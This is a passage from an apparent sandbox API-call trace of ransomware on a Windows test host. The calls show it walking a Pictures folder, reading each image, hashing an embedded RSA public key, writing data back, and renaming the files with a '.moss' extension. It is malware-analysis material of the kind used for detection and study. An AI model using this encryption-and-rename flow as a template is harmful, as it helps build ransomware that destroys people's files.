lpNumberOfBytesRead=0x401fb70*=0x15da1, lpOverlapped=0x0) returned 1 [0171.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.953] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.954] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.954] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.954] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.954] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.954] GetLastError () returned 0x0 [0171.954] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.954] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.954] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.954] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.954] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.955] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.955] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15da1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.955] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.955] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.956] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\R0VSd_xa3T76_EiBOSQI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\r0vsd_xa3t76_eibosqi.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\R0VSd_xa3T76_EiBOSQI.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\r0vsd_xa3t76_eibosqi.gif.moss")) returned 1 [0171.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.956] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.957] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.957] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbc94c0, ftCreationTime.dwHighDateTime=0x1d5de44, ftLastAccessTime.dwLowDateTime=0x30060cc0, ftLastAccessTime.dwHighDateTime=0x1d5e2f7, ftLastWriteTime.dwLowDateTime=0x30060cc0, ftLastWriteTime.dwHighDateTime=0x1d5e2f7, nFileSizeHigh=0x0, nFileSizeLow=0xcbea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zQ0p5kK8-M.bmp", cAlternateFileName="ZQ0P5K~1.BMP")) returned 1 [0171.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\zQ0p5kK8-M.bmp") returned=".bmp" [0171.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\zQ0p5kK8-M.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\zq0p5kk8-m.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.958] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=52202) returned 1 [0171.958] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.960] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xcbc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.960] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.961] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xcbea, lpOverlapped=0x0) returned 1 [0171.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.961] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.962] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.962] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.962] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.962] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.962] GetLastError () returned 0x0 [0171.962] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.962] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.962] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.962] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.962] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.962] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.963] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xcbea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.963] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.963] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\zQ0p5kK8-M.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\zq0p5kk8-m.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\zQ0p5kK8-M.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\zq0p5kk8-m.bmp.moss")) returned 1 [0171.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.964] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.965] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbc94c0, ftCreationTime.dwHighDateTime=0x1d5de44, ftLastAccessTime.dwLowDateTime=0x30060cc0, ftLastAccessTime.dwHighDateTime=0x1d5e2f7, ftLastWriteTime.dwLowDateTime=0x30060cc0, ftLastWriteTime.dwHighDateTime=0x1d5e2f7, nFileSizeHigh=0x0, nFileSizeLow=0xcbea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zQ0p5kK8-M.bmp", cAlternateFileName="ZQ0P5K~1.BMP")) returned 0 [0171.965] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0171.965] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.965] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\") returned="ZyOX_xDVWOQqjcupRL\\" [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0171.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0171.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b511a8 [0171.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.966] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.966] PathFindFileNameW (pszPath="") returned="" [0171.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.966] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\0mRKn3DgJies5pe.gif") returned=".gif" [0171.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\0mRKn3DgJies5pe.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\0mrkn3dgjies5pe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.966] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=51390) returned 1 [0171.966] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.969] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc898, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.969] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.969] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc8be, lpOverlapped=0x0) returned 1 [0171.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.970] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.970] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.970] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.971] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.971] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.971] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.971] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.971] GetLastError () returned 0x0 [0171.971] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.971] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.971] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.971] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.971] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.971] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.971] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.972] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc8be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.972] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.972] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\0mRKn3DgJies5pe.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\0mrkn3dgjies5pe.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\0mRKn3DgJies5pe.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\0mrkn3dgjies5pe.gif.moss")) returned 1 [0171.973] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\54yB_qBDNM_.jpg") returned=".jpg" [0171.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\54yB_qBDNM_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\54yb_qbdnm_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.974] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=37907) returned 1 [0171.974] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.977] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x93ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.977] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.991] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.991] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9413, lpOverlapped=0x0) returned 1 [0171.992] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.992] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.992] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.992] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.993] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.993] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.993] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.993] CryptGetHashParam 